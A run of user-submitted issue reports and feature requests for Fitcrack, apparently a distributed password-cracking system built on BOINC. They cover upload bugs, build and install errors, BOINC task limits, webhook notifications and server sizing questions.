Hello. I found this issue in tandem with issue #66. When I try to create a dictionary that has an issue, Fitcrack rejects this and shows an error message (as expected). However, when I then try to upload the dictionary (or any dictionary with the same name) again, a "File with name buggy_dict.txt already exists. Path: /usr/share/collections/dictionaries/buggy_dict.txt" error message is shown. Since the original faulty dictionary was only half added to Fitcrack—that is to say that the file exists in /usr/share/collections/dictionaries/ but is not in the database and thus not shown in Webadmin—a dictionary with the same name can never be added again (unless one has access to the server Fitcrack is running on and removes the orphan file).
I identified that the issue stems from this part of code
Concretely, on this line
the uploaded file is saved to /usr/share/collections/dictionaries/ but in the case of any issue with the file, no cleanup of the created file is performed, causing an orphan file to be left behind that causes the described issues.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
Hello,
We have a way to update the web and server side; however, the database cannot be updated as of now. Is there a way to update the SQL database?
Hi!
Another feature I didn't see: is it possible to enable or disable an agent from the admin page without going to each machine running the BOINC client? AKA stop it from tasking if there is any available or if it is assigned to one.
It would be great to have webhook functionality that makes it possible to send valuable event notifications such as:
to a Telegram chat with a bot, or any other notification API that accepts a GET request with params.
Example webhook URI for telegram:
https://api.telegram.org/bot000000000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/sendMessage?chat_id=-0000000000000&text=URL_encoded_message_text
I am trying to install the Fitcrack server on a laptop, but I keep encountering an "error during compilation" while installing Fitcrack using the automatic installer and selecting option 1 (this is the same for option 2).
Laptop specs:
Acer Chromebook model: N17Q8
What is reported at the end:
make[2]: *** [Makefile:1748: libboinc_crypt_la-crypt.lo] Error 1
make[2]: Leaving directory '/root/fitcrack-2.3.0/boinc/lib'
make[1]: *** [Makefile:648: all-recursive] Error 1
make[1]: Leaving directory '/root/fitcrack-2.3.0/boinc'
make: *** [Makefile:552: all] Error 2
Error during compilation.
root@server:~/fitcrack-2.3.0#
Full output: https://pastebin.com/cbp68hrb
Is there something I'm missing?
Unsure if this is purely a BOINC issue, is there a setting somewhere in fitcrack to remove this limit?
this limit stops computers from contributing more guesses and I get stuck with 0 clients working.
A thread that has a few people complaining of the same issue, this seems to stem from boinc not giving work to clients
This thread says that there is an option of MAX_TASK_LIMIT that should be accessible by the project host? I can't seem to find this option in fitcrack_OPS
I have tried to add the OneWordlistToListThemAll.txt (99 GB) using the "Add from server" functionality; this generates the error "An unhandled accepted exception has occurred".
Sometimes this will result in a wordlist being added, but unusable, this includes being unable to delete the entry that was created. Other times nothing happens.
According to chromium's code which works with windows pipes too:
https://chromium.googlesource.com/chromium/src/+/master/remoting/host/file_transfer/file_chooser_win.cc
We just need to do small changes to support Async I/O. Proposed changes:
https://pastebin.com/nB0Vb2jL
if (is_NONBLOCK_) {
    DWORD mode = PIPE_NOWAIT;
    if (!SetNamedPipeHandleState(read_, &mode, NULL, NULL)) {
        RunnerUtils::runtimeException("SetNamedPipeHandleState() failed", GetLastError());
    }
}
Hello, first of all thanks for the great project!
I installed everything under ubuntu 18.04 without an error message.
When I call up 127.0.0.1 to start Fitcrack, the red message "Network Error" appears.
What can be the problem?
Thanks HG
Recently trying to install fitcrack on an oracle cloud instance and keep getting the following error:
`
#0 236.9 x86_64-w64-mingw32-g++ -I'./include/' -I'./include/boinc/' -I'./include/libzip/' -DGIT_REV="\"\"" -Werror -Wall -Wextra -O3 -g3 -std=c++11 -c src/main.cpp -o obj/main.o
#0 40391.1 x86_64-w64-mingw32-g++: fatal error: Killed signal terminated program cc1plus
#0 40391.1 compilation terminated.
#0 40391.7 make: *** [Makefile:45: obj/main.o] Error 1
#0 40394.5 objcopy: './bin/runner.exe': No such file
#0 40394.8 objcopy: './bin/runner.exe': No such file
#0 40394.9 rm: cannot remove './bin/runner.exe': No such file or directory
------
Dockerfile:124
--------------------
122 | RUN apt-get install -y g++-mingw-w64-x86-64
123 | RUN chmod +x ./update_client_bins.sh
124 | >>> RUN bash ./update_client_bins.sh
125 |
126 | WORKDIR /srv/fitcrack/
--------------------
ERROR: failed to solve: process "/bin/sh -c bash ./update_client_bins.sh" did not complete successfully: exit code: 1
ubuntu@<SERVERNAME>:~/fitcrack$
Server details:
Ubuntu 22.04.1 LTS x86_64
Kernel: 5.15.0-1029-oracle
It seems that something is terminating the compilation?
Hi,
when I try to start the daemons with the ./bin/start this happens:
root@ariel:/home/boincadm/projects/fitcrack# ./bin/start
Entering ENABLED mode
Starting daemons
No daemons for this host found - check host name in config.xml
I tried to modify the config.xml label:
localhost
to:
ariel.badnet.it
But nothing happens. The hostname on which Fitcrack is installed is https://ariel.badnet.it.
What am I doing wrong?
EDIT: solved putting only "ariel" in the host label
What hardware requirements (RAM, CPU, HD) does my server need if I want to run about 500 hosts?
Is there a bottleneck or are the hosts unlimited in number?
Adding hosts automatically is great! It would be great if I could prioritize the individual jobs. For example with a selection button between 1-3. At "1" 50% of the next 10 new hosts are assigned to the job. At "2" 30% and at "3" 20%. So you could prioritize the jobs better when new hosts sign up.
File to patch:
Skip this patch? [y]
Skipping patch.
1 out of 1 hunk ignored
The command '/bin/sh -c patch -p0 < installer/fitcrack_changes_in_boinc.patch' returned a non-zero code: 1
ERROR: Service 'fitcrack_server' failed to build : Build failed
root@docker:/home/user/fitcrack# docker-compose version
docker-compose version 1.29.2, build unknown
docker-py version: 5.0.3
CPython version: 3.10.6
OpenSSL version: OpenSSL 3.0.2 15 Mar 2022
root@docker:/home/user/fitcrack# `
From what I can tell, the lines that have issues are where it's trying to copy files into specific places. I verified the files are there.
Any ideas out there in the community?